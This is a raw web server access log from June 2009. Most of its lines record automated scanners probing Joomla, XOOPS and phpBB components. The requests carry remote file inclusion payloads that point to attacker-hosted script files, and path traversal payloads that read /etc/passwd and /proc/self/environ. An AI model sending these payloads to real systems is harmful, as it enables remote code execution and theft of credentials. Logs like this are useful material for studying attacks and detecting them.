70.85.165.10 - - [12/Jun/2009:12:24:10 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
77.221.130.15 - - [12/Jun/2009:12:25:19 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.221.130.15 - - [12/Jun/2009:12:26:37 -0700] "GET /logs/access_071212.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.221.130.15 - - [12/Jun/2009:12:27:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.189.40.249 - - [12/Jun/2009:12:41:57 -0700] "GET /logs//include/write.php?dir=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.189.40.249 - - [12/Jun/2009:12:45:08 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://cahaya123.wen.ru/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:12:49:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:12:49:34 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:12:49:34 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:39 -0700] "GET /include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:39 -0700] "GET /logs//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:39 -0700] "GET /logs/access_070912.log%20%20//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:45 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:46 -0700] "GET /include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:49:46 -0700] "GET /logs//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:12:50:38 -0700] "GET /logs/access_071012.log%20%20//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:54:37 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:54:38 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:54:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:57:12 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:57:12 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:12:57:13 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:12:58:20 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:12:58:20 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:12:58:20 -0700] "GET /logs/access_070812.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:00:25 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:00:25 -0700] "GET /logs/access_070812.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:00:25 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:13:00:38 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:13:00:38 -0700] "GET /logs/access_070812.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:13:00:38 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:13:04:50 -0700] "GET /logs/access_060412.log HTTP/1.0" 200 495751 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:07 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:08:08 -0700] "GET /logs/access_070812.log//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:33 -0700] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:33 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:08:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:13:09:08 -0700] "GET /logs/access.log//atom.php5?page=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:13:09:09 -0700] "GET /atom.php5?page=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:13:09:10 -0700] "GET /logs//atom.php5?page=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:09:48 -0700] "GET /logs/access_071012.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:10:25 -0700] "GET /logs/access_071012.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
66.128.53.115 - - [12/Jun/2009:13:10:39 -0700] "GET /logs/access_071012.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:13:14:32 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:13:14:33 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:13:14:33 -0700] "GET /logs/access_070812.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:18:17 -0700] "GET /logs/access_071212.log/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:18:17 -0700] "GET /administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:18:17 -0700] "GET /logs/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:19:22 -0700] "GET /logs/access_071212.log/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:19:22 -0700] "GET /administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:19:22 -0700] "GET /logs/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:19:43 -0700] "GET /logs/access_071112.log/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:20:38 -0700] "GET /logs/access_071112.log/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:21:53 -0700] "GET /logs/access_071112.log%20/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:21:55 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:21:55 -0700] "GET /logs/access_070812.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:21:55 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
12.68.140.202 - - [12/Jun/2009:13:22:35 -0700] "GET /logs/access_071112.log%20/administrator/components/com_colorlab/admin.color.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:13:24:44 -0700] "GET /logs/access_070812.log//components/com_forum/download.php?phpbb_root_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:09 -0700] "GET /logs/access_071012.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /logs/access_071012.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /logs/access_071012.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:10 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
210.188.218.41 - - [12/Jun/2009:13:25:11 -0700] "GET /logs/access_071012.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:13:27:11 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:38:00 -0700] "GET /logs/access_070812.log//components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:38:01 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:13:38:01 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:13:47:10 -0700] "GET /logs/access_070912.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:13:47:10 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [12/Jun/2009:13:47:10 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:52:30 -0700] "GET /logs/access_070912.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:52:30 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:13:52:30 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [12/Jun/2009:13:54:38 -0700] "GET /clipart/lines/horizontal/?M=A HTTP/1.0" 200 710 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:56:16 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:56:16 -0700] "GET /modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:56:16 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:03 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:03 -0700] "GET /modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:03 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:39 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:39 -0700] "GET /modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:57:39 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:58:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:58:00 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:59:12 -0700] "GET /logs/access_071112.log%20%20//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:59:23 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:13:59:23 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:14:00:07 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:14:01:22 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:14:01:22 -0700] "GET /logs/access_070912.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [12/Jun/2009:14:01:22 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [12/Jun/2009:14:01:47 -0700] "GET /logs/access_070912.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:14:19:06 -0700] "GET /logs/scripts.log//modules/My_eGallery/public/displayCategory.php?basepath=http://hac.or.kr/technote7/data/idnovo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:14:19:06 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hac.or.kr/technote7/data/idnovo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:14:19:07 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://hac.or.kr/technote7/data/idnovo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.30.142.125 - - [12/Jun/2009:14:44:27 -0700] "GET /logs/access_081212.log HTTP/1.0" 200 18482686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "projectpr.com"
77.221.130.5 - - [12/Jun/2009:14:50:20 -0700] "GET /logs/access_070812.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.221.130.5 - - [12/Jun/2009:14:50:20 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
